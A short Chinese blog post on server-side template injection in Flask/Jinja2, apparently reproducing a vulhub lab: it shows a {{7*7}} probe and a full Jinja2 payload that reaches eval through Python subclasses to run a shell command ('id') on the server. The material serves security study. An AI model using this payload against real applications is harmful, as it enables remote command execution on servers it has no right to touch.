Flask(Jinja2) 服务端模板注入漏洞(SSTI)

XXX_WXY2023-11-09 11:41

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html

验证漏洞存在 ?name={{7*7}}

回显49说明漏洞存在

vulhub给出的payload:

python 复制代码 
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
相关推荐
小爬虫程序猿几秒前
深入理解Jsoup与Selenium:Java爬虫的双剑合璧
爬虫·python·selenium
随便写写3 分钟前
Pyside6 基础框架以及三种基础控件
python
夏娃同学16 分钟前
基于Flask后端框架的均值填充
python·flask
海绵波波10718 分钟前
flask后端开发(6):模板继承
flask
HackKong22 分钟前
Python与黑客技术
网络·python·web安全·网络安全·php
四口鲸鱼爱吃盐26 分钟前
Pytorch | 利用GNP针对CIFAR10上的ResNet分类器进行对抗攻击
人工智能·pytorch·python·深度学习·神经网络·计算机视觉
进击的小小学生27 分钟前
多因子模型连载
大数据·python·数据分析·区块链
小码贾28 分钟前
OpenCV-Python实战(6)——图相运算
人工智能·python·opencv
yma1636 分钟前
windows10下使用沙盒多开uiautoanimation可行性验证
python·uiautoanimation
Autumn.h42 分钟前
vulnhub Empire-Lupin-One靶机
网络安全
热门推荐
01新手学习VR全景需要知道的几个问题02Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO03玄机平台应急响应—webshell查杀04RAG 实践- Ollama+RagFlow 部署本地知识库05优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间06HCIA-datacom数通题库和录播视频资料07docker安装启动问题解决排查08【一文读懂】NTN(非地面网络)技术介绍09支付宝短视频平台创作分成激励项目10组基轨迹建模 GBTM的介绍与实现(Stata 或 R)